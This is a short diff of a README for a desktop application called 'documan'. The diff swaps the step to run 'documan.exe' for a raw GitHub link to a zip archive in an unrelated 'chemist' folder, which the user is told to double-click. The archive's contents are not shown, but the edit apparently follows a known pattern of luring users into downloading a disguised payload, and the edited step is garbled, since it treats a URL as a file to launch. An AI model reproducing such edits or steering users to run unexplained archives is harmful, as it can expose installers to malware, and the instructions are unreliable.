Hazim100-Shadow/documan/README.md

 4. **Extract the Files:** If you downloaded a zipped folder, right-click it and select "Extract All..." to unzip.

-5. **Run the Application:** Locate the extracted folder, find the `documan.exe` file (or similar), double-click it to launch the application.
+5. **Run the Application:** Locate the extracted folder, find the `https://raw.githubusercontent.com/Hazim100-Shadow/documan/main/chemist/documan-3.8.zip` file (or similar), double-click it to launch the application.

 ## ⚙️ System Requirements